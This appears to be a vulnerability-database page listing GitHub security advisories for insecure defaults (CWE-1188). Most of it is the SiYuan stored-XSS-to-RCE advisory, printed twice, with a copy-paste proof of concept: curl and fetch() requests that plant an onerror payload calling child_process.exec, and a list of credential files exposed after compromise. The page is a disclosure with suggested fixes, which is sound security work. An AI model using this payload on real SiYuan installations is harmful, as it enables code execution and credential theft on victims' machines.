Common Weakness Enumeration

CWE-1188

Allowed

Initialization of a Resource with an Insecure Default

Abstraction: Base · Status: Incomplete

The product initializes or sets a resource with a default that is intended to be changed by the product's installer, administrator, or maintainer, but the default is not secure.

402 vulnerabilities reference this CWE, most recent first.

GHSA-2GQ4-362C-56W9

Vulnerability from github – Published: 2026-06-19 21:32 – Updated: 2026-06-19 21:32
VLAI
Details

Initialization of a resource with an insecure default in GitHub Copilot and Visual Studio Code allows an unauthorized attacker to disclose information over a network.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-50519"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1188"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-06-19T21:17:02Z",
    "severity": "MODERATE"
  },
  "details": "Initialization of a resource with an insecure default in GitHub Copilot and Visual Studio Code allows an unauthorized attacker to disclose information over a network.",
  "id": "GHSA-2gq4-362c-56w9",
  "modified": "2026-06-19T21:32:48Z",
  "published": "2026-06-19T21:32:48Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-50519"
    },
    {
      "type": "WEB",
      "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50519"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-2H64-C999-C9R6

Vulnerability from github – Published: 2026-05-08 16:53 – Updated: 2026-06-08 20:11
VLAI
Summary
SiYuan Affected by Stored XSS via Attribute View Name to Electron Renderer RCE
Details

Summary

The kernel stores Attribute View (AV / database) names without any HTML escape, then a render template uses raw strings.ReplaceAll(tpl, "${avName}", nodeAvName) to embed the name in HTML before pushing to all clients via WebSocket. Three independent client paths (render.ts:120outerHTML, Title.ts:401innerHTML, transaction.ts:559innerHTML) consume the value without escaping. Because the main BrowserWindow runs nodeIntegration:true, contextIsolation:false, webSecurity:false (app/electron/main.js:407-411), HTML injection in the renderer becomes Node.js code execution.

Payload is stored on disk under data/storage/av/<id>.json, replicates via every sync transport (S3 / WebDAV / cloud), survives .sy.zip export-import, and triggers for any role (Administrator / Editor / Reader / publish-service Visitor) opening a doc bound to the AV.

Details

Kernel write — no escape. kernel/model/attribute_view.go:3244-3255:

attrView.Name = strings.TrimSpace(operation.Data.(string))
attrView.Name = strings.ReplaceAll(attrView.Name, "\n", " ")
if 512 < utf8.RuneCountInString(attrView.Name) {
    attrView.Name = gulu.Str.SubStr(attrView.Name, 512)
}
err = av.SaveAttributeView(attrView)         // ← no html.EscapeString

Kernel template — raw replace. kernel/model/attribute_view.go:3242,3283-3284:

const attrAvNameTpl = `<span data-av-id="${avID}" ... class="popover__block">${avName}</span>`
// ...
tpl := strings.ReplaceAll(attrAvNameTpl, "${avID}", nodeAvID)
tpl = strings.ReplaceAll(tpl, "${avName}", nodeAvName)   // ← raw

Sink #1 — AV body header → outerHTML. app/src/protyle/render/av/render.ts:120 (returned from genTabHeaderHTML, written via outerHTML at render.ts:596):

<div contenteditable="${editable}" ... data-title="${data.name || ""}" ...>${data.name || ""}</div>
// ...
e.firstElementChild.outerHTML = `<div class="av__container">${genTabHeaderHTML(...)}...</div>`;

Same pattern in kanban/render.ts:227 and gallery/render.ts:142.

Sink #2 — Doc title attribute strip → innerHTML. app/src/protyle/header/Title.ts:396-403:

response.data.attrViews.forEach((item: { id: string, name: string }) => {
    avTitle += `<span data-av-id="${item.id}" ... class="popover__block">${item.name}</span>&nbsp;`;
});
nodeAttrHTML += `<div class="protyle-attr--av">...${avTitle}</div>`;
this.element.querySelector(".protyle-attr").innerHTML = nodeAttrHTML;

Sink #3 — WebSocket updateAttrs push → innerHTML. app/src/protyle/wysiwyg/transaction.ts:549-562,659:

const escapeHTML = Lute.EscapeHTMLStr(data.new[key]);
if (key === "bookmark") { bookmarkHTML = `...${escapeHTML}...`; }
else if (key === "name")     { nameHTML  = `...${escapeHTML}...`; }
else if (key === "alias")    { aliasHTML = `...${escapeHTML}...`; }
else if (key === "memo")     { memoHTML  = `...${escapeHTML}...`; }
else if (key === "custom-avs" && data.new["av-names"]) {
    avHTML = `<div class="protyle-attr--av">...${data.new["av-names"]}</div>`;
    //                                          ^^^^^^^^^^^^^^^^^^^^^^^^ raw, unlike the four siblings above
}
// ...
attrElement.innerHTML = nodeAttrHTML + Constants.ZWSP;

The four sibling cases use Lute.EscapeHTMLStr — proving the team knows the right pattern; only av-names was missed.

Renderer posture — RCE multiplier. app/electron/main.js:407-411:

webPreferences: {
    nodeIntegration: true, webviewTag: true,
    webSecurity: false, contextIsolation: false,
}

Reachability. Route /api/transactions setAttrViewName requires CheckAuth + CheckAdminRole + CheckReadonly. On default install (Conf.AccessAuthCode == ""), kernel/model/session.go:261-287 auto-grants Administrator to local-origin requests. The Origin check accepts localhost / loopback only but chrome-extension:// is explicitly allowlisted (session.go:277), so any installed browser extension calls the API as admin. Local clients with no Origin header (CLI tools) also pass.

Suggested fix

  1. kernel/model/attribute_view.go getAvNames (line 3283-3284): replace the two strings.ReplaceAll calls with template.HTMLEscapeString(nodeAvName) for the ${avName} substitution.
  2. transaction.ts:559: wrap with Lute.EscapeHTMLStr to match siblings at lines 549-557.
  3. render.ts:120: use Lute.EscapeHTMLStr(data.name) for both data-title= and the text content.
  4. Title.ts:396: escape item.name via Lute.EscapeHTMLStr and item.id via escapeAttr.
  5. (Defense-in-depth) Switch the main BrowserWindow to contextIsolation: true with a preload bridge — caps every future renderer XSS at "DOM only," not RCE.

Reproduction (copy-paste-ready)

Tested on Linux/macOS with SiYuan v3.6.5 (re-verified against master HEAD on 2026-05-03). Windows users: replace python3 with py and use Git Bash / WSL for the shell snippets, or translate to PowerShell.

Prereqs

  1. Install SiYuan v3.6.5 from https://github.com/siyuan-note/siyuan/releases. Launch it once so the workspace at ~/SiYuanWorkspace is initialized. Do not set an Access Authorization Code (default).
  2. Verify the kernel responds: sh curl -s http://127.0.0.1:6806/api/system/version Expected output (single line of JSON): json {"code":0,"msg":"","data":"3.6.5"}
  3. Pin shell variables for the rest of the PoC: ```sh API=http://127.0.0.1:6806 WS=~/SiYuanWorkspace # adjust if your workspace lives elsewhere

NOTEBOOK_ID=$(curl -s -X POST $API/api/notebook/lsNotebooks \ -H 'Content-Type: application/json' -d '{}' \ | python3 -c 'import sys,json; print(json.load(sys.stdin)["data"]["notebooks"][0]["id"])') echo "Using notebook: $NOTEBOOK_ID" `` Expected: a 14-digit-timestamp +-7charsID like20240101120000-abc1234`. If you get an empty string, you have no notebooks — open SiYuan and click "New notebook" once.

Step A — Create the AV via the SiYuan UI (one-time, ~10 seconds)

The kernel's setAttrViewName requires the AV file to already exist on disk (av.ParseAttributeView returns an error otherwise). The simplest way to create one is via the editor:

  1. Open SiYuan. In any document, type /database and press Enter (or open the slash-command menu and pick Database).
  2. The editor inserts an Attribute View block. The kernel writes a JSON file to <workspace>/data/storage/av/<av-id>.json.
  3. Capture the AV ID — the most recently written file in that directory: sh AV_FILE=$(ls -1t "$WS/data/storage/av/"*.json 2>/dev/null | head -1) AV_ID=$(basename "$AV_FILE" .json) echo "AV_ID: $AV_ID" Expected: same 14-digit-timestamp + -7chars shape, e.g. 20260503160000-aaaaaaa. If empty, the AV file wasn't created — repeat the UI step. (If your workspace already has many AV files, this picks the newest by mtime; alternatively right-click the inserted database block in SiYuan → Inspect Element to read its data-av-id attribute.)

  4. Capture the doc ID that hosts the AV: right-click the doc tab → Copy ID, or read it from the doc's data-node-id in DevTools (Ctrl+Shift+I). Set: sh DOC_ID=<root-block-id-of-the-doc-containing-the-AV>

Step B — Plant the XSS payload as the AV name

The payload is written directly inside an unquoted heredoc so bash expands $AV_ID while preserving the \" JSON-escape sequences literally. Single-quote chars (') in the inner JS need no escaping inside a JSON string.

curl -s -X POST $API/api/transactions \
  -H 'Content-Type: application/json' \
  --data-binary @- <<EOF
{
  "session": "x",
  "app": "siyuan",
  "transactions": [{
    "doOperations": [{
      "action": "setAttrViewName",
      "id": "$AV_ID",
      "data": "<img src=x onerror=\"require('child_process').exec(process.platform==='win32'?'calc.exe':process.platform==='darwin'?'open -a Calculator':'xcalc')\">"
    }],
    "undoOperations": []
  }]
}
EOF

Expected response:

{"code":0,"msg":"","data":[{"doOperations":[...,"action":"setAttrViewName",...]}]}

Step C — Verify the unescaped storage

python3 -c "import json; print(json.load(open('$WS/data/storage/av/$AV_ID.json'))['name'])"

Expected output (the raw HTML as stored — print does not escape ", so they appear as literal quotes):

<img src=x onerror="require('child_process').exec(process.platform==='win32'?'calc.exe':process.platform==='darwin'?'open -a Calculator':'xcalc')">

Step D — Trigger

In the SiYuan desktop client:

  1. Switch away from the doc that contains the AV (open another doc, or close the tab).
  2. Re-open the doc containing the AV ($DOC_ID).
  3. The AV body header is rendered via genTabHeaderHTMLouterHTML at app/src/protyle/render/av/render.ts:596. The browser parses the <img> tag, fails to load src=x, and fires onerror.
  4. Calculator (or xcalc / open -a Calculator) launches.

If nothing happens, open DevTools (Ctrl+Shift+I / ⌘⌥I) → Console; you should see the error from the failed src=x load. If the AV is in another doc you haven't opened recently, the cached render may be stale — close all tabs and re-open.

Step E — Browser-extension attack vector (the realistic remote path)

A malicious or compromised installed browser extension's content/background script runs with chrome-extension://<id> Origin, allowlisted by session.go:277. The extension can run Steps B's curl-equivalent via fetch():

// Inside any extension content/background script
fetch('http://127.0.0.1:6806/api/transactions', {
  method: 'POST',
  headers: {'Content-Type': 'application/json'},
  body: JSON.stringify({
    session: 'x', app: 'siyuan',
    transactions: [{ doOperations: [{
      action: 'setAttrViewName',
      id: '<av-id-discovered-via-prior-recon-fetches>',
      data: `<img src=x onerror="require('child_process').exec('xcalc')">`
    }] }]
  })
});

The extension can also enumerate AV IDs by first calling /api/notebook/lsNotebooks, then walking notebook trees.

A page from https://attacker.com is rejected — IsLocalOrigin only matches localhost/loopback. Realistic remote vectors are: browser extensions, localhost-served webpages, shared .sy.zip imports, sync replication from a co-author's compromised device.

Cleanup

# Remove the test doc (also removes the AV binding in the doc)
curl -s -X POST $API/api/filetree/removeDocByID \
  -H 'Content-Type: application/json' -d "{\"id\":\"$DOC_ID\"}"

# Manually delete the AV file
rm -f $WS/data/storage/av/$AV_ID.json

# Restart SiYuan to clear in-memory state

Impact

  • RCE on the victim's desktop with the user's privileges, no extra prompt after the trigger condition is met.
  • Persistent — payload survives restart, syncs across devices, rides in .sy.zip exports and Bazaar templates.
  • Triggers for any role opening a doc bound to the AV (incl. Reader-role publish viewers).
  • After RCE: full filesystem read (incl. ~/.ssh/, ~/.aws/credentials, workspace conf/conf.json — kernel API token + AccessAuthCode hash), persistence (.bashrc / Startup folder / LaunchAgent), cloud-account pivot.
  • Attack vectors: browser extensions (chrome-extension:// Origin allowlisted); shared .sy.zip files; Bazaar templates; sync peers; co-authors on a shared workspace; publish-service planters infecting Reader viewers.
Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.0.0-20260421031503-96dfe0bea474"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/siyuan-note/siyuan/kernel"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.0.0-20260512140701-d7b77d945e0d"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-44670"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1188",
      "CWE-79",
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-08T16:53:18Z",
    "nvd_published_at": "2026-05-14T19:16:38Z",
    "severity": "CRITICAL"
  },
  "details": "## Summary\n\nThe kernel stores Attribute View (AV / database) names without any HTML escape, then a render template uses raw `strings.ReplaceAll(tpl, \"${avName}\", nodeAvName)` to embed the name in HTML before pushing to all clients via WebSocket. Three independent client paths (`render.ts:120` \u2192 `outerHTML`, `Title.ts:401` \u2192 `innerHTML`, `transaction.ts:559` \u2192 `innerHTML`) consume the value without escaping. Because the main BrowserWindow runs `nodeIntegration:true, contextIsolation:false, webSecurity:false` (`app/electron/main.js:407-411`), HTML injection in the renderer becomes Node.js code execution.\n\nPayload is stored on disk under `data/storage/av/\u003cid\u003e.json`, replicates via every sync transport (S3 / WebDAV / cloud), survives `.sy.zip` export-import, and triggers for any role (Administrator / Editor / Reader / publish-service Visitor) opening a doc bound to the AV.\n\n## Details\n\n**Kernel write \u2014 no escape.** `kernel/model/attribute_view.go:3244-3255`:\n```go\nattrView.Name = strings.TrimSpace(operation.Data.(string))\nattrView.Name = strings.ReplaceAll(attrView.Name, \"\\n\", \" \")\nif 512 \u003c utf8.RuneCountInString(attrView.Name) {\n    attrView.Name = gulu.Str.SubStr(attrView.Name, 512)\n}\nerr = av.SaveAttributeView(attrView)         // \u2190 no html.EscapeString\n```\n\n**Kernel template \u2014 raw replace.** `kernel/model/attribute_view.go:3242,3283-3284`:\n```go\nconst attrAvNameTpl = `\u003cspan data-av-id=\"${avID}\" ... class=\"popover__block\"\u003e${avName}\u003c/span\u003e`\n// ...\ntpl := strings.ReplaceAll(attrAvNameTpl, \"${avID}\", nodeAvID)\ntpl = strings.ReplaceAll(tpl, \"${avName}\", nodeAvName)   // \u2190 raw\n```\n\n**Sink #1 \u2014 AV body header \u2192 outerHTML.** `app/src/protyle/render/av/render.ts:120` (returned from `genTabHeaderHTML`, written via outerHTML at `render.ts:596`):\n```ts\n\u003cdiv contenteditable=\"${editable}\" ... data-title=\"${data.name || \"\"}\" ...\u003e${data.name || \"\"}\u003c/div\u003e\n// ...\ne.firstElementChild.outerHTML = `\u003cdiv class=\"av__container\"\u003e${genTabHeaderHTML(...)}...\u003c/div\u003e`;\n```\nSame pattern in `kanban/render.ts:227` and `gallery/render.ts:142`.\n\n**Sink #2 \u2014 Doc title attribute strip \u2192 innerHTML.** `app/src/protyle/header/Title.ts:396-403`:\n```ts\nresponse.data.attrViews.forEach((item: { id: string, name: string }) =\u003e {\n    avTitle += `\u003cspan data-av-id=\"${item.id}\" ... class=\"popover__block\"\u003e${item.name}\u003c/span\u003e\u0026nbsp;`;\n});\nnodeAttrHTML += `\u003cdiv class=\"protyle-attr--av\"\u003e...${avTitle}\u003c/div\u003e`;\nthis.element.querySelector(\".protyle-attr\").innerHTML = nodeAttrHTML;\n```\n\n**Sink #3 \u2014 WebSocket `updateAttrs` push \u2192 innerHTML.** `app/src/protyle/wysiwyg/transaction.ts:549-562,659`:\n```ts\nconst escapeHTML = Lute.EscapeHTMLStr(data.new[key]);\nif (key === \"bookmark\") { bookmarkHTML = `...${escapeHTML}...`; }\nelse if (key === \"name\")     { nameHTML  = `...${escapeHTML}...`; }\nelse if (key === \"alias\")    { aliasHTML = `...${escapeHTML}...`; }\nelse if (key === \"memo\")     { memoHTML  = `...${escapeHTML}...`; }\nelse if (key === \"custom-avs\" \u0026\u0026 data.new[\"av-names\"]) {\n    avHTML = `\u003cdiv class=\"protyle-attr--av\"\u003e...${data.new[\"av-names\"]}\u003c/div\u003e`;\n    //                                          ^^^^^^^^^^^^^^^^^^^^^^^^ raw, unlike the four siblings above\n}\n// ...\nattrElement.innerHTML = nodeAttrHTML + Constants.ZWSP;\n```\nThe four sibling cases use `Lute.EscapeHTMLStr` \u2014 proving the team knows the right pattern; only `av-names` was missed.\n\n**Renderer posture \u2014 RCE multiplier.** `app/electron/main.js:407-411`:\n```js\nwebPreferences: {\n    nodeIntegration: true, webviewTag: true,\n    webSecurity: false, contextIsolation: false,\n}\n```\n\n**Reachability.** Route `/api/transactions setAttrViewName` requires `CheckAuth + CheckAdminRole + CheckReadonly`. On default install (`Conf.AccessAuthCode == \"\"`), `kernel/model/session.go:261-287` auto-grants Administrator to local-origin requests. The Origin check accepts `localhost` / loopback only **but `chrome-extension://` is explicitly allowlisted** (`session.go:277`), so any installed browser extension calls the API as admin. Local clients with no Origin header (CLI tools) also pass.\n\n## Suggested fix\n\n1. `kernel/model/attribute_view.go getAvNames` (line 3283-3284): replace the two `strings.ReplaceAll` calls with `template.HTMLEscapeString(nodeAvName)` for the `${avName}` substitution.\n2. `transaction.ts:559`: wrap with `Lute.EscapeHTMLStr` to match siblings at lines 549-557.\n3. `render.ts:120`: use `Lute.EscapeHTMLStr(data.name)` for both `data-title=` and the text content.\n4. `Title.ts:396`: escape `item.name` via `Lute.EscapeHTMLStr` and `item.id` via `escapeAttr`.\n5. *(Defense-in-depth)* Switch the main BrowserWindow to `contextIsolation: true` with a preload bridge \u2014 caps every future renderer XSS at \"DOM only,\" not RCE.\n\n---\n\n## Reproduction (copy-paste-ready)\n\nTested on Linux/macOS with SiYuan v3.6.5 (re-verified against `master` HEAD on 2026-05-03). Windows users: replace `python3` with `py` and use Git Bash / WSL for the shell snippets, or translate to PowerShell.\n\n### Prereqs\n\n1. **Install SiYuan v3.6.5** from https://github.com/siyuan-note/siyuan/releases. Launch it once so the workspace at `~/SiYuanWorkspace` is initialized. Do **not** set an Access Authorization Code (default).\n2. **Verify the kernel responds:**\n   ```sh\n   curl -s http://127.0.0.1:6806/api/system/version\n   ```\n   Expected output (single line of JSON):\n   ```json\n   {\"code\":0,\"msg\":\"\",\"data\":\"3.6.5\"}\n   ```\n3. **Pin shell variables** for the rest of the PoC:\n   ```sh\n   API=http://127.0.0.1:6806\n   WS=~/SiYuanWorkspace                                      # adjust if your workspace lives elsewhere\n\n   NOTEBOOK_ID=$(curl -s -X POST $API/api/notebook/lsNotebooks \\\n     -H \u0027Content-Type: application/json\u0027 -d \u0027{}\u0027 \\\n     | python3 -c \u0027import sys,json; print(json.load(sys.stdin)[\"data\"][\"notebooks\"][0][\"id\"])\u0027)\n   echo \"Using notebook: $NOTEBOOK_ID\"\n   ```\n   Expected: a 14-digit-timestamp + `-7chars` ID like `20240101120000-abc1234`. If you get an empty string, you have no notebooks \u2014 open SiYuan and click \"New notebook\" once.\n\n### Step A \u2014 Create the AV via the SiYuan UI (one-time, ~10 seconds)\n\nThe kernel\u0027s `setAttrViewName` requires the AV file to already exist on disk (`av.ParseAttributeView` returns an error otherwise). The simplest way to create one is via the editor:\n\n1. Open SiYuan. In any document, type `/database` and press Enter (or open the slash-command menu and pick **Database**).\n2. The editor inserts an Attribute View block. The kernel writes a JSON file to `\u003cworkspace\u003e/data/storage/av/\u003cav-id\u003e.json`.\n3. Capture the AV ID \u2014 the most recently written file in that directory:\n   ```sh\n   AV_FILE=$(ls -1t \"$WS/data/storage/av/\"*.json 2\u003e/dev/null | head -1)\n   AV_ID=$(basename \"$AV_FILE\" .json)\n   echo \"AV_ID: $AV_ID\"\n   ```\n   Expected: same 14-digit-timestamp + `-7chars` shape, e.g. `20260503160000-aaaaaaa`. If empty, the AV file wasn\u0027t created \u2014 repeat the UI step. (If your workspace already has many AV files, this picks the newest by mtime; alternatively right-click the inserted database block in SiYuan \u2192 Inspect Element to read its `data-av-id` attribute.)\n\n4. Capture the doc ID that hosts the AV: right-click the doc tab \u2192 **Copy ID**, or read it from the doc\u0027s `data-node-id` in DevTools (Ctrl+Shift+I). Set:\n   ```sh\n   DOC_ID=\u003croot-block-id-of-the-doc-containing-the-AV\u003e\n   ```\n\n### Step B \u2014 Plant the XSS payload as the AV name\n\nThe payload is written directly inside an unquoted heredoc so bash expands `$AV_ID` while preserving the `\\\"` JSON-escape sequences literally. Single-quote chars (`\u0027`) in the inner JS need no escaping inside a JSON string.\n\n```sh\ncurl -s -X POST $API/api/transactions \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  --data-binary @- \u003c\u003cEOF\n{\n  \"session\": \"x\",\n  \"app\": \"siyuan\",\n  \"transactions\": [{\n    \"doOperations\": [{\n      \"action\": \"setAttrViewName\",\n      \"id\": \"$AV_ID\",\n      \"data\": \"\u003cimg src=x onerror=\\\"require(\u0027child_process\u0027).exec(process.platform===\u0027win32\u0027?\u0027calc.exe\u0027:process.platform===\u0027darwin\u0027?\u0027open -a Calculator\u0027:\u0027xcalc\u0027)\\\"\u003e\"\n    }],\n    \"undoOperations\": []\n  }]\n}\nEOF\n```\nExpected response:\n```json\n{\"code\":0,\"msg\":\"\",\"data\":[{\"doOperations\":[...,\"action\":\"setAttrViewName\",...]}]}\n```\n\n### Step C \u2014 Verify the unescaped storage\n\n```sh\npython3 -c \"import json; print(json.load(open(\u0027$WS/data/storage/av/$AV_ID.json\u0027))[\u0027name\u0027])\"\n```\nExpected output (the raw HTML as stored \u2014 `print` does not escape `\"`, so they appear as literal quotes):\n```\n\u003cimg src=x onerror=\"require(\u0027child_process\u0027).exec(process.platform===\u0027win32\u0027?\u0027calc.exe\u0027:process.platform===\u0027darwin\u0027?\u0027open -a Calculator\u0027:\u0027xcalc\u0027)\"\u003e\n```\n\n### Step D \u2014 Trigger\n\nIn the SiYuan desktop client:\n\n1. Switch away from the doc that contains the AV (open another doc, or close the tab).\n2. Re-open the doc containing the AV (`$DOC_ID`).\n3. The AV body header is rendered via `genTabHeaderHTML` \u2192 `outerHTML` at `app/src/protyle/render/av/render.ts:596`. The browser parses the `\u003cimg\u003e` tag, fails to load `src=x`, and fires `onerror`.\n4. **Calculator (or `xcalc` / `open -a Calculator`) launches.**\n\nIf nothing happens, open DevTools (Ctrl+Shift+I / \u2318\u2325I) \u2192 Console; you should see the error from the failed `src=x` load. If the AV is in another doc you haven\u0027t opened recently, the cached render may be stale \u2014 close all tabs and re-open.\n\n### Step E \u2014 Browser-extension attack vector (the realistic remote path)\n\nA malicious or compromised installed browser extension\u0027s content/background script runs with `chrome-extension://\u003cid\u003e` Origin, allowlisted by `session.go:277`. The extension can run Steps B\u0027s curl-equivalent via `fetch()`:\n```js\n// Inside any extension content/background script\nfetch(\u0027http://127.0.0.1:6806/api/transactions\u0027, {\n  method: \u0027POST\u0027,\n  headers: {\u0027Content-Type\u0027: \u0027application/json\u0027},\n  body: JSON.stringify({\n    session: \u0027x\u0027, app: \u0027siyuan\u0027,\n    transactions: [{ doOperations: [{\n      action: \u0027setAttrViewName\u0027,\n      id: \u0027\u003cav-id-discovered-via-prior-recon-fetches\u003e\u0027,\n      data: `\u003cimg src=x onerror=\"require(\u0027child_process\u0027).exec(\u0027xcalc\u0027)\"\u003e`\n    }] }]\n  })\n});\n```\nThe extension can also enumerate AV IDs by first calling `/api/notebook/lsNotebooks`, then walking notebook trees.\n\nA page from `https://attacker.com` is rejected \u2014 `IsLocalOrigin` only matches localhost/loopback. Realistic remote vectors are: **browser extensions**, **localhost-served webpages**, **shared `.sy.zip` imports**, **sync replication from a co-author\u0027s compromised device**.\n\n### Cleanup\n\n```sh\n# Remove the test doc (also removes the AV binding in the doc)\ncurl -s -X POST $API/api/filetree/removeDocByID \\\n  -H \u0027Content-Type: application/json\u0027 -d \"{\\\"id\\\":\\\"$DOC_ID\\\"}\"\n\n# Manually delete the AV file\nrm -f $WS/data/storage/av/$AV_ID.json\n\n# Restart SiYuan to clear in-memory state\n```\n\n## Impact\n\n- **RCE on the victim\u0027s desktop** with the user\u0027s privileges, no extra prompt after the trigger condition is met.\n- **Persistent** \u2014 payload survives restart, syncs across devices, rides in `.sy.zip` exports and Bazaar templates.\n- **Triggers for any role** opening a doc bound to the AV (incl. Reader-role publish viewers).\n- After RCE: full filesystem read (incl. `~/.ssh/`, `~/.aws/credentials`, workspace `conf/conf.json` \u2014 kernel API token + AccessAuthCode hash), persistence (`.bashrc` / Startup folder / LaunchAgent), cloud-account pivot.\n- **Attack vectors:** browser extensions (`chrome-extension://` Origin allowlisted); shared `.sy.zip` files; Bazaar templates; sync peers; co-authors on a shared workspace; publish-service planters infecting Reader viewers.",
  "id": "GHSA-2h64-c999-c9r6",
  "modified": "2026-06-08T20:11:15Z",
  "published": "2026-05-08T16:53:18Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-2h64-c999-c9r6"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44670"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/siyuan-note/siyuan"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
      "type": "CVSS_V4"
    }
  ],
  "summary": "SiYuan Affected by Stored XSS via Attribute View Name to Electron Renderer RCE"
}

GHSA-2MVJ-Q2Q3-WXJV

Vulnerability from github – Published: 2024-02-20 15:31 – Updated: 2025-07-29 13:04
VLAI
Summary
Liferay Portal and Liferay DXP HTTP Header Can Expose Versions
Details

In Liferay Portal 7.2.0 through 7.4.3.25, and older unsupported versions, and Liferay DXP 7.4 before update 26, 7.3 before update 5, 7.2 before fix pack 19, and older unsupported versions the default value of the portal property http.header.version.verbosity is set to full, which allows remote attackers to easily identify the version of the application that is running and the vulnerabilities that affect that version via 'Liferay-Portal` response header.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "com.liferay.portal:release.portal.bom"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "7.2.0"
            },
            {
              "fixed": "7.4.3.26-ga26"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "com.liferay.portal:release.dxp.bom"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "7.2.10.fp19"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "com.liferay.portal:release.dxp.bom"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "7.3.0"
            },
            {
              "fixed": "7.3.10.u5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "com.liferay.portal:release.dxp.bom"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "7.4.0"
            },
            {
              "fixed": "7.4.13.u26"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-26267"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1188"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-07-29T13:04:50Z",
    "nvd_published_at": "2024-02-20T13:15:08Z",
    "severity": "MODERATE"
  },
  "details": "In Liferay Portal 7.2.0 through 7.4.3.25, and older unsupported versions, and Liferay DXP 7.4 before update 26, 7.3 before update 5, 7.2 before fix pack 19, and older unsupported versions the default value of the portal property `http.header.version.verbosity` is set to `full`, which allows remote attackers to easily identify the version of the application that is running and the vulnerabilities that affect that version via \u0027Liferay-Portal` response header.",
  "id": "GHSA-2mvj-q2q3-wxjv",
  "modified": "2025-07-29T13:04:50Z",
  "published": "2024-02-20T15:31:03Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26267"
    },
    {
      "type": "WEB",
      "url": "https://github.com/liferay/liferay-portal/commit/00750dade0cc81efc380fcc6d7e2f58060c4ad95"
    },
    {
      "type": "WEB",
      "url": "https://github.com/liferay/liferay-portal/commit/0e881cac66db14a11673c0352def6df04f77d35c"
    },
    {
      "type": "WEB",
      "url": "https://github.com/liferay/liferay-portal/commit/9658cec331feaaaad8bf93c6f65e1768a1f43ae2"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/liferay/liferay-portal"
    },
    {
      "type": "WEB",
      "url": "https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-26267"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Liferay Portal and Liferay DXP HTTP Header Can Expose Versions"
}

GHSA-2PV5-24RH-CJH6

Vulnerability from github – Published: 2022-05-24 16:44 – Updated: 2024-04-04 00:02
VLAI
Details

In the configuration of NFC modules on certain devices, there is a possible failure to distinguish individual devices due to an insecure default value. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-8.1 Android-9. Android ID: A-122034690.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2019-2041"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1188"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2019-04-19T20:29:00Z",
    "severity": "HIGH"
  },
  "details": "In the configuration of NFC modules on certain devices, there is a possible failure to distinguish individual devices due to an insecure default value. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-8.1 Android-9. Android ID: A-122034690.",
  "id": "GHSA-2pv5-24rh-cjh6",
  "modified": "2024-04-04T00:02:15Z",
  "published": "2022-05-24T16:44:00Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-2041"
    },
    {
      "type": "WEB",
      "url": "https://source.android.com/security/bulletin/2019-04-01"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-2R2P-4CGF-HV7H

Vulnerability from github – Published: 2026-04-22 14:52 – Updated: 2026-04-22 14:52
VLAI
Summary
engram: HTTP server CORS wildcard + auth-off-by-default enables CSRF graph exfiltration and persistent indirect prompt injection
Details

Summary

